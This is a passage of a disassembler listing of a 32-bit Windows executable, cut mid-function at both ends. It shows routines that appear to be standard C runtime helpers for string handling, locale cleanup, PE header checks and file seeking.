mov eax, [edi]
mov eax, [eax+14h]
mov [ebp+arg_14], eax
loc_40C47C: ; CODE XREF: sub_40C33C+136�j
cmp [ebp+arg_10], ebx
jnz short loc_40C489
mov eax, [edi]
mov eax, [eax+4]
mov [ebp+arg_10], eax
loc_40C489: ; CODE XREF: sub_40C33C+143�j
push [ebp+arg_14]
call sub_4102B0
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_40C49B
loc_40C497: ; CODE XREF: sub_40C33C+6D�j
; sub_40C33C+AA�j ...
xor eax, eax
jmp short loc_40C4E2
; ---------------------------------------------------------------------------
loc_40C49B: ; CODE XREF: sub_40C33C+159�j
cmp eax, [ebp+arg_10]
jz short loc_40C4BE
push ebx
push ebx
lea ecx, [ebp+arg_8]
push ecx
push [ebp+arg_4]
push eax
push [ebp+arg_10]
call sub_4102F7
mov esi, eax
add esp, 18h
cmp esi, ebx
jz short loc_40C497
mov [ebp+arg_4], esi
loc_40C4BE: ; CODE XREF: sub_40C33C+162�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push [ebp+arg_14]
call ds:dword_41D128
cmp esi, ebx
mov edi, eax
jz short loc_40C4E0
push esi
call sub_403603
pop ecx
loc_40C4E0: ; CODE XREF: sub_40C33C+19B�j
mov eax, edi
loc_40C4E2: ; CODE XREF: sub_40C33C+12F�j
; sub_40C33C+15D�j
lea esp, [ebp-14h]
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_402710
leave
retn
sub_40C33C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C4F4 proc near ; CODE XREF: sub_404816+96�p
; sub_40CA44+83�p
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_0]
lea ecx, [ebp+var_10]
call sub_40271F
push [ebp+arg_1C]
lea ecx, [ebp+var_10]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40C33C
add esp, 1Ch
cmp [ebp+var_4], 0
jz short locret_40C532
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40C532: ; CODE XREF: sub_40C4F4+35�j
leave
retn
sub_40C4F4 endp
; =============== S U B R O U T I N E =======================================
sub_40C534 proc near ; CODE XREF: sub_404E21+E9�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz loc_40C6C2
push dword ptr [esi+4]
call sub_403603
push dword ptr [esi+8]
call sub_403603
push dword ptr [esi+0Ch]
call sub_403603
push dword ptr [esi+10h]
call sub_403603
push dword ptr [esi+14h]
call sub_403603
push dword ptr [esi+18h]
call sub_403603
push dword ptr [esi]
call sub_403603
push dword ptr [esi+20h]
call sub_403603
push dword ptr [esi+24h]
call sub_403603
push dword ptr [esi+28h]
call sub_403603
push dword ptr [esi+2Ch]
call sub_403603
push dword ptr [esi+30h]
call sub_403603
push dword ptr [esi+34h]
call sub_403603
push dword ptr [esi+1Ch]
call sub_403603
push dword ptr [esi+38h]
call sub_403603
push dword ptr [esi+3Ch]
call sub_403603
add esp, 40h
push dword ptr [esi+40h]
call sub_403603
push dword ptr [esi+44h]
call sub_403603
push dword ptr [esi+48h]
call sub_403603
push dword ptr [esi+4Ch]
call sub_403603
push dword ptr [esi+50h]
call sub_403603
push dword ptr [esi+54h]
call sub_403603
push dword ptr [esi+58h]
call sub_403603
push dword ptr [esi+5Ch]
call sub_403603
push dword ptr [esi+60h]
call sub_403603
push dword ptr [esi+64h]
call sub_403603
push dword ptr [esi+68h]
call sub_403603
push dword ptr [esi+6Ch]
call sub_403603
push dword ptr [esi+70h]
call sub_403603
push dword ptr [esi+74h]
call sub_403603
push dword ptr [esi+78h]
call sub_403603
push dword ptr [esi+7Ch]
call sub_403603
add esp, 40h
push dword ptr [esi+80h]
call sub_403603
push dword ptr [esi+84h]
call sub_403603
push dword ptr [esi+88h]
call sub_403603
push dword ptr [esi+8Ch]
call sub_403603
push dword ptr [esi+90h]
call sub_403603
push dword ptr [esi+94h]
call sub_403603
push dword ptr [esi+98h]
call sub_403603
push dword ptr [esi+9Ch]
call sub_403603
push dword ptr [esi+0A0h]
call sub_403603
push dword ptr [esi+0A4h]
call sub_403603
push dword ptr [esi+0A8h]
call sub_403603
add esp, 2Ch
loc_40C6C2: ; CODE XREF: sub_40C534+7�j
pop esi
retn
sub_40C534 endp
; =============== S U B R O U T I N E =======================================
sub_40C6C4 proc near ; CODE XREF: sub_404E21+64�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_40C702
mov eax, [esi]
cmp eax, ds:off_423F38
jz short loc_40C6DE
push eax
call sub_403603
pop ecx
loc_40C6DE: ; CODE XREF: sub_40C6C4+11�j
mov eax, [esi+4]
cmp eax, ds:off_423F3C
jz short loc_40C6F0
push eax
call sub_403603
pop ecx
loc_40C6F0: ; CODE XREF: sub_40C6C4+23�j
mov esi, [esi+8]
cmp esi, ds:off_423F40
jz short loc_40C702
push esi
call sub_403603
pop ecx
loc_40C702: ; CODE XREF: sub_40C6C4+7�j
; sub_40C6C4+35�j
pop esi
retn
sub_40C6C4 endp
; =============== S U B R O U T I N E =======================================
sub_40C704 proc near ; CODE XREF: sub_404E21+43�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_40C78B
mov eax, [esi+0Ch]
cmp eax, ds:off_423F44
jz short loc_40C71F
push eax
call sub_403603
pop ecx
loc_40C71F: ; CODE XREF: sub_40C704+12�j
mov eax, [esi+10h]
cmp eax, ds:off_423F48
jz short loc_40C731
push eax
call sub_403603
pop ecx
loc_40C731: ; CODE XREF: sub_40C704+24�j
mov eax, [esi+14h]
cmp eax, ds:off_423F4C
jz short loc_40C743
push eax
call sub_403603
pop ecx
loc_40C743: ; CODE XREF: sub_40C704+36�j
mov eax, [esi+18h]
cmp eax, ds:off_423F50
jz short loc_40C755
push eax
call sub_403603
pop ecx
loc_40C755: ; CODE XREF: sub_40C704+48�j
mov eax, [esi+1Ch]
cmp eax, ds:off_423F54
jz short loc_40C767
push eax
call sub_403603
pop ecx
loc_40C767: ; CODE XREF: sub_40C704+5A�j
mov eax, [esi+20h]
cmp eax, ds:off_423F58
jz short loc_40C779
push eax
call sub_403603
pop ecx
loc_40C779: ; CODE XREF: sub_40C704+6C�j
mov esi, [esi+24h]
cmp esi, ds:off_423F5C
jz short loc_40C78B
push esi
call sub_403603
pop ecx
loc_40C78B: ; CODE XREF: sub_40C704+7�j
; sub_40C704+7E�j
pop esi
retn
sub_40C704 endp
; =============== S U B R O U T I N E =======================================
sub_40C78D proc near ; CODE XREF: sub_409AB4+117�p
; sub_409AB4+139�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
push ebx
xor ebx, ebx
cmp eax, ebx
push esi
push edi
jz short loc_40C7A2
mov edi, [esp+0Ch+arg_4]
cmp edi, ebx
ja short loc_40C7BD
loc_40C7A2: ; CODE XREF: sub_40C78D+B�j
; sub_40C78D+3A�j
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_40C7AC: ; CODE XREF: sub_40C78D+69�j
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_40C7FA
; ---------------------------------------------------------------------------
loc_40C7BD: ; CODE XREF: sub_40C78D+13�j
mov esi, [esp+0Ch+arg_8]
cmp esi, ebx
jnz short loc_40C7C9
loc_40C7C5: ; CODE XREF: sub_40C78D+48�j
mov [eax], bl
jmp short loc_40C7A2
; ---------------------------------------------------------------------------
loc_40C7C9: ; CODE XREF: sub_40C78D+36�j
mov edx, eax
loc_40C7CB: ; CODE XREF: sub_40C78D+44�j
cmp [edx], bl
jz short loc_40C7D3
inc edx
dec edi
jnz short loc_40C7CB
loc_40C7D3: ; CODE XREF: sub_40C78D+40�j
cmp edi, ebx
jz short loc_40C7C5
loc_40C7D7: ; CODE XREF: sub_40C78D+55�j
mov cl, [esi]
mov [edx], cl
inc edx
inc esi
cmp cl, bl
jz short loc_40C7E4
dec edi
jnz short loc_40C7D7
loc_40C7E4: ; CODE XREF: sub_40C78D+52�j
cmp edi, ebx
jnz short loc_40C7F8
mov [eax], bl
call sub_4057D3
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_40C7AC
; ---------------------------------------------------------------------------
loc_40C7F8: ; CODE XREF: sub_40C78D+59�j
xor eax, eax
loc_40C7FA: ; CODE XREF: sub_40C78D+2E�j
pop edi
pop esi
pop ebx
retn
sub_40C78D endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_40C814: ; CODE XREF: J8@F_7_S:0040C821�j
mov al, [edx]
or al, al
jz short loc_40C823
add edx, 1
bts [esp], eax
jmp short loc_40C814
; ---------------------------------------------------------------------------
loc_40C823: ; CODE XREF: J8@F_7_S:0040C818�j
mov esi, [ebp+8]
or ecx, 0FFFFFFFFh
lea ecx, [ecx+0]
loc_40C82C: ; CODE XREF: J8@F_7_S:0040C83C�j
add ecx, 1
mov al, [esi]
or al, al
jz short loc_40C83E
add esi, 1
bt [esp], eax
jnb short loc_40C82C
loc_40C83E: ; CODE XREF: J8@F_7_S:0040C833�j
mov eax, ecx
add esp, 20h
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C846 proc near ; CODE XREF: sub_409AB4+F1�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp [ebp+arg_C], ebx
push edi
jnz short loc_40C866
cmp esi, ebx
jnz short loc_40C86A
cmp [ebp+arg_4], ebx
jnz short loc_40C871
loc_40C85F: ; CODE XREF: sub_40C846+4D�j
; sub_40C846+8C�j
xor eax, eax
loc_40C861: ; CODE XREF: sub_40C846+44�j
; sub_40C846+9E�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40C866: ; CODE XREF: sub_40C846+E�j
cmp esi, ebx
jz short loc_40C871
loc_40C86A: ; CODE XREF: sub_40C846+12�j
mov edi, [ebp+arg_4]
cmp edi, ebx
ja short loc_40C88C
loc_40C871: ; CODE XREF: sub_40C846+17�j
; sub_40C846+22�j ...
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_40C87B: ; CODE XREF: sub_40C846+B1�j
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_40C861
; ---------------------------------------------------------------------------
loc_40C88C: ; CODE XREF: sub_40C846+29�j
cmp [ebp+arg_C], ebx
jnz short loc_40C895
mov [esi], bl
jmp short loc_40C85F
; ---------------------------------------------------------------------------
loc_40C895: ; CODE XREF: sub_40C846+49�j
mov edx, [ebp+arg_8]
cmp edx, ebx
jnz short loc_40C8A0
mov [esi], bl
jmp short loc_40C871
; ---------------------------------------------------------------------------
loc_40C8A0: ; CODE XREF: sub_40C846+54�j
cmp [ebp+arg_C], 0FFFFFFFFh
mov eax, esi
jnz short loc_40C8B7
loc_40C8A8: ; CODE XREF: sub_40C846+6D�j
mov cl, [edx]
mov [eax], cl
inc eax
inc edx
cmp cl, bl
jz short loc_40C8D0
dec edi
jnz short loc_40C8A8
jmp short loc_40C8D0
; ---------------------------------------------------------------------------
loc_40C8B7: ; CODE XREF: sub_40C846+60�j
; sub_40C846+81�j
mov cl, [edx]
mov [eax], cl
inc eax
inc edx
cmp cl, bl
jz short loc_40C8C9
dec edi
jz short loc_40C8C9
dec [ebp+arg_C]
jnz short loc_40C8B7
loc_40C8C9: ; CODE XREF: sub_40C846+79�j
; sub_40C846+7C�j
cmp [ebp+arg_C], ebx
jnz short loc_40C8D0
mov [eax], bl
loc_40C8D0: ; CODE XREF: sub_40C846+6A�j
; sub_40C846+6F�j ...
cmp edi, ebx
jnz short loc_40C85F
cmp [ebp+arg_C], 0FFFFFFFFh
jnz short loc_40C8E9
mov eax, [ebp+arg_4]
push 50h
mov [esi+eax-1], bl
pop eax
jmp loc_40C861
; ---------------------------------------------------------------------------
loc_40C8E9: ; CODE XREF: sub_40C846+92�j
mov [esi], bl
call sub_4057D3
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_40C87B
sub_40C846 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C8F9 proc near ; CODE XREF: sub_40E9C7+32�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_8]
test ebx, ebx
jnz short loc_40C910
xor eax, eax
jmp loc_40C9AA
; ---------------------------------------------------------------------------
loc_40C910: ; CODE XREF: sub_40C8F9+E�j
cmp ebx, 4
push edi
jb short loc_40C98B
lea edi, [ebx-4]
test edi, edi
jbe short loc_40C98B
mov ecx, [ebp+arg_4]
mov eax, [ebp+arg_0]
loc_40C923: ; CODE XREF: sub_40C8F9+66�j
mov dl, [eax]
add eax, 4
add ecx, 4
test dl, dl
jz short loc_40C981
cmp dl, [ecx-4]
jnz short loc_40C981
mov dl, [eax-3]
test dl, dl
jz short loc_40C977
cmp dl, [ecx-3]
jnz short loc_40C977
mov dl, [eax-2]
test dl, dl
jz short loc_40C96D
cmp dl, [ecx-2]
jnz short loc_40C96D
mov dl, [eax-1]
test dl, dl
jz short loc_40C963
cmp dl, [ecx-1]
jnz short loc_40C963
add [ebp+var_4], 4
cmp [ebp+var_4], edi
jb short loc_40C923
jmp short loc_40C9A2
; ---------------------------------------------------------------------------
loc_40C963: ; CODE XREF: sub_40C8F9+58�j
; sub_40C8F9+5D�j
movzx eax, byte ptr [eax-1]
movzx ecx, byte ptr [ecx-1]
jmp short loc_40C9B3
; ---------------------------------------------------------------------------
loc_40C96D: ; CODE XREF: sub_40C8F9+4C�j
; sub_40C8F9+51�j
movzx eax, byte ptr [eax-2]
movzx ecx, byte ptr [ecx-2]
jmp short loc_40C9B3
; ---------------------------------------------------------------------------
loc_40C977: ; CODE XREF: sub_40C8F9+40�j
; sub_40C8F9+45�j
movzx eax, byte ptr [eax-3]
movzx ecx, byte ptr [ecx-3]
jmp short loc_40C9B3
; ---------------------------------------------------------------------------
loc_40C981: ; CODE XREF: sub_40C8F9+34�j
; sub_40C8F9+39�j
movzx eax, byte ptr [eax-4]
movzx ecx, byte ptr [ecx-4]
jmp short loc_40C9B3
; ---------------------------------------------------------------------------
loc_40C98B: ; CODE XREF: sub_40C8F9+1B�j
; sub_40C8F9+22�j
mov ecx, [ebp+arg_4]
mov eax, [ebp+arg_0]
jmp short loc_40C9A2
; ---------------------------------------------------------------------------
loc_40C993: ; CODE XREF: sub_40C8F9+AC�j
mov dl, [eax]
test dl, dl
jz short loc_40C9AD
cmp dl, [ecx]
jnz short loc_40C9AD
inc eax
inc ecx
inc [ebp+var_4]
loc_40C9A2: ; CODE XREF: sub_40C8F9+68�j
; sub_40C8F9+98�j
cmp [ebp+var_4], ebx
jb short loc_40C993
xor eax, eax
loc_40C9A9: ; CODE XREF: sub_40C8F9+BC�j
pop edi
loc_40C9AA: ; CODE XREF: sub_40C8F9+12�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40C9AD: ; CODE XREF: sub_40C8F9+9E�j
; sub_40C8F9+A2�j
movzx eax, byte ptr [eax]
movzx ecx, byte ptr [ecx]
loc_40C9B3: ; CODE XREF: sub_40C8F9+72�j
; sub_40C8F9+7C�j ...
sub eax, ecx
jmp short loc_40C9A9
sub_40C8F9 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_40C9D4: ; CODE XREF: J8@F_7_S:0040C9E1�j
mov al, [edx]
or al, al
jz short loc_40C9E3
add edx, 1
bts [esp], eax
jmp short loc_40C9D4
; ---------------------------------------------------------------------------
loc_40C9E3: ; CODE XREF: J8@F_7_S:0040C9D8�j
mov esi, [ebp+8]
mov edi, edi
loc_40C9E8: ; CODE XREF: J8@F_7_S:0040C9F5�j
mov al, [esi]
or al, al
jz short loc_40C9FA
add esi, 1
bt [esp], eax
jnb short loc_40C9E8
lea eax, [esi-1]
loc_40C9FA: ; CODE XREF: J8@F_7_S:0040C9EC�j
add esp, 20h
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA00 proc near ; CODE XREF: sub_40565A+93�p
; sub_4069D7+34D�p ...
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_40271F
movzx eax, [ebp+arg_0]
mov ecx, [ebp+var_10]
mov ecx, [ecx+0C8h]
movzx eax, word ptr [ecx+eax*2]
and eax, 8000h
cmp [ebp+var_4], 0
jz short locret_40CA34
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40CA34: ; CODE XREF: sub_40CA00+2B�j
leave
retn
sub_40CA00 endp
; =============== S U B R O U T I N E =======================================
sub_40CA36 proc near ; CODE XREF: J8@F_7_S:00409532�p
; J8@F_7_S:004099EC�p ...
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_40CA00
pop ecx
pop ecx
retn
sub_40CA36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA44 proc near ; CODE XREF: sub_40565A+32�p
; sub_40A7C0+81�p ...
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push [ebp+arg_8]
lea ecx, [ebp+var_18]
call sub_40271F
mov ebx, [ebp+arg_0]
lea eax, [ebx+1]
cmp eax, 100h
ja short loc_40CA72
mov eax, [ebp+var_18]
mov eax, [eax+0C8h]
movzx eax, word ptr [eax+ebx*2]
jmp short loc_40CAE7
; ---------------------------------------------------------------------------
loc_40CA72: ; CODE XREF: sub_40CA44+1D�j
mov [ebp+arg_0], ebx
sar [ebp+arg_0], 8
lea eax, [ebp+var_18]
push eax
mov eax, [ebp+arg_0]
and eax, 0FFh
push eax
call sub_40CA00
test eax, eax
pop ecx
pop ecx
jz short loc_40CAA3
mov al, byte ptr [ebp+arg_0]
push 2
mov [ebp+var_8], al
mov [ebp+var_7], bl
mov [ebp+var_6], 0
pop ecx
jmp short loc_40CAAD
; ---------------------------------------------------------------------------
loc_40CAA3: ; CODE XREF: sub_40CA44+4B�j
xor ecx, ecx
mov [ebp+var_8], bl
mov [ebp+var_7], 0
inc ecx
loc_40CAAD: ; CODE XREF: sub_40CA44+5D�j
mov eax, [ebp+var_18]
push 1
push dword ptr [eax+14h]
push dword ptr [eax+4]
lea eax, [ebp+var_4]
push eax
push ecx
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push 1
push eax
call sub_40C4F4
add esp, 20h
test eax, eax
jnz short loc_40CAE3
cmp [ebp+var_C], al
jz short loc_40CADF
mov eax, [ebp+var_10]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40CADF: ; CODE XREF: sub_40CA44+92�j
xor eax, eax
jmp short loc_40CAF7
; ---------------------------------------------------------------------------
loc_40CAE3: ; CODE XREF: sub_40CA44+8D�j
movzx eax, [ebp+var_4]
loc_40CAE7: ; CODE XREF: sub_40CA44+2C�j
and eax, [ebp+arg_4]
cmp [ebp+var_C], 0
jz short loc_40CAF7
mov ecx, [ebp+var_10]
and dword ptr [ecx+70h], 0FFFFFFFDh
loc_40CAF7: ; CODE XREF: sub_40CA44+9D�j
; sub_40CA44+AA�j
pop ebx
leave
retn
sub_40CA44 endp
; =============== S U B R O U T I N E =======================================
sub_40CAFA proc near ; CODE XREF: sub_407B19+F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_42641C, eax
retn
sub_40CAFA endp
; ---------------------------------------------------------------------------
loc_40CB04: ; DATA XREF: sub_40CB14:loc_40CB79�o
push dword ptr [esp+4]
call ds:dword_41D120
xor eax, eax
inc eax
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CB14 proc near ; CODE XREF: sub_405881+26�p
; sub_405934+78�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 14h
push offset dword_421760
call __SEH_prolog4
xor edi, edi
mov [ebp+var_1C], edi
push ds:dword_42641C
call sub_405193
pop ecx
mov esi, eax
cmp esi, edi
jnz short loc_40CB8A
lea eax, [ebp+var_1C]
push eax
call sub_407906
pop ecx
cmp eax, edi
jz short loc_40CB52
push edi
push edi
push edi
push edi
push edi
call sub_402E3D
add esp, 14h
loc_40CB52: ; CODE XREF: sub_40CB14+2F�j
cmp [ebp+var_1C], 1
jz short loc_40CB79
push offset aKernel32_dl_10 ; "kernel32.dll"
call ds:dword_41D0E4
cmp eax, edi
jz short loc_40CB79
push offset aInitializecrit ; "InitializeCriticalSectionAndSpinCount"
push eax
call ds:dword_41D0EC
mov esi, eax
cmp esi, edi
jnz short loc_40CB7E
loc_40CB79: ; CODE XREF: sub_40CB14+42�j
; sub_40CB14+51�j
mov esi, offset loc_40CB04
loc_40CB7E: ; CODE XREF: sub_40CB14+63�j
push esi
call sub_405127
pop ecx
mov ds:dword_42641C, eax
loc_40CB8A: ; CODE XREF: sub_40CB14+21�j
mov [ebp+ms_exc.disabled], edi
push [ebp+arg_4]
push [ebp+arg_0]
call esi
mov [ebp+var_20], eax
jmp short loc_40CBC9
; ---------------------------------------------------------------------------
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_24], eax
xor ecx, ecx
cmp eax, 0C0000017h
setz cl
mov eax, ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
cmp [ebp+var_24], 0C0000017h
jnz short loc_40CBC5
push 8
call ds:dword_41D174
loc_40CBC5: ; CODE XREF: sub_40CB14+A7�j
and [ebp+var_20], 0
loc_40CBC9: ; CODE XREF: sub_40CB14+84�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
mov eax, [ebp+var_20]
call __SEH_epilog4
retn
sub_40CB14 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40CBE0 proc near ; CODE XREF: sub_40CC52+16�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp word ptr [ecx], 5A4Dh
jz short loc_40CBEE
loc_40CBEB: ; CODE XREF: sub_40CBE0+19�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40CBEE: ; CODE XREF: sub_40CBE0+9�j
mov eax, [ecx+3Ch]
add eax, ecx
cmp dword ptr [eax], 4550h
jnz short loc_40CBEB
xor ecx, ecx
cmp word ptr [eax+18h], 10Bh
setz cl
mov eax, ecx
retn
sub_40CBE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40CC10 proc near ; CODE XREF: sub_40CC52+27�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
push ebx
push esi
movzx esi, word ptr [ecx+6]
xor edx, edx
test esi, esi
push edi
lea eax, [eax+ecx+18h]
jbe short loc_40CC4C
mov edi, [esp+0Ch+arg_4]
loc_40CC32: ; CODE XREF: sub_40CC10+3A�j
mov ecx, [eax+0Ch]
cmp edi, ecx
jb short loc_40CC42
mov ebx, [eax+8]
add ebx, ecx
cmp edi, ebx
jb short loc_40CC4E
loc_40CC42: ; CODE XREF: sub_40CC10+27�j
add edx, 1
add eax, 28h
cmp edx, esi
jb short loc_40CC32
loc_40CC4C: ; CODE XREF: sub_40CC10+1C�j
xor eax, eax
loc_40CC4E: ; CODE XREF: sub_40CC10+30�j
pop edi
pop esi
pop ebx
retn
sub_40CC10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CC52 proc near ; CODE XREF: sub_406640+FF�p
; sub_407979+E�p ...
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset dword_421780
call __SEH_prolog4
and [ebp+ms_exc.disabled], 0
mov edx, 400000h
push edx
call sub_40CBE0
pop ecx
test eax, eax
jz short loc_40CCAF
mov eax, [ebp+arg_0]
sub eax, edx
push eax
push edx
call sub_40CC10
pop ecx
pop ecx
test eax, eax
jz short loc_40CCAF
mov eax, [eax+24h]
shr eax, 1Fh
not eax
and eax, 1
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
jmp short loc_40CCB8
; ---------------------------------------------------------------------------
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
xor ecx, ecx
cmp eax, 0C0000005h
setz cl
mov eax, ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
loc_40CCAF: ; CODE XREF: sub_40CC52+1E�j
; sub_40CC52+30�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
xor eax, eax
loc_40CCB8: ; CODE XREF: sub_40CC52+44�j
call __SEH_epilog4
retn
sub_40CC52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CCBE proc near ; CODE XREF: sub_409DAD+2EE�p
; sub_409DAD+3C8�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
push edi
push esi
mov [ebp+var_4], eax
call sub_40ED7D
or edi, 0FFFFFFFFh
cmp eax, edi
pop ecx
jnz short loc_40CCF3
call sub_4057D3
mov dword ptr [eax], 9
loc_40CCED: ; CODE XREF: sub_40CCBE+5E�j
mov eax, edi
mov edx, edi
jmp short loc_40CD3D
; ---------------------------------------------------------------------------
loc_40CCF3: ; CODE XREF: sub_40CCBE+22�j
push [ebp+arg_C]
lea ecx, [ebp+var_4]
push ecx
push [ebp+var_8]
push eax
call ds:dword_41D074
cmp eax, edi
mov [ebp+var_8], eax
jnz short loc_40CD1E
call ds:dword_41D0F0
test eax, eax
jz short loc_40CD1E
push eax
call sub_4057F9
pop ecx
jmp short loc_40CCED
; ---------------------------------------------------------------------------
loc_40CD1E: ; CODE XREF: sub_40CCBE+4B�j
; sub_40CCBE+55�j
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
mov eax, ds:dword_433CA0[eax*4]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FDh
mov eax, [ebp+var_8]
mov edx, [ebp+var_4]
loc_40CD3D: ; CODE XREF: sub_40CCBE+33�j
pop edi
pop esi
leave
retn
sub_40CCBE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CD41 proc near ; CODE XREF: sub_4067D6+116�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 14h
push offset dword_4217A0
call __SEH_prolog4
or esi, 0FFFFFFFFh
mov [ebp+var_24], esi
mov [ebp+var_20], esi
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40CD7A
call sub_4057E6
and dword ptr [eax], 0
call sub_4057D3
mov dword ptr [eax], 9
loc_40CD71: ; CODE XREF: sub_40CD41+66�j
mov eax, esi
mov edx, esi
jmp loc_40CE4A
; ---------------------------------------------------------------------------
loc_40CD7A: ; CODE XREF: sub_40CD41+1B�j
xor edi, edi
cmp eax, edi
jl short loc_40CD88
cmp eax, ds:dword_433C84
jb short loc_40CDA9
loc_40CD88: ; CODE XREF: sub_40CD41+3D�j
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
jmp short loc_40CD71
; ---------------------------------------------------------------------------
loc_40CDA9: ; CODE XREF: sub_40CD41+45�j
mov ecx, eax
sar ecx, 5
lea ebx, ds:433CA0h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [ebx]
movzx ecx, byte ptr [ecx+esi+4]
and ecx, 1
jnz short loc_40CDEF
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 9
push edi
push edi
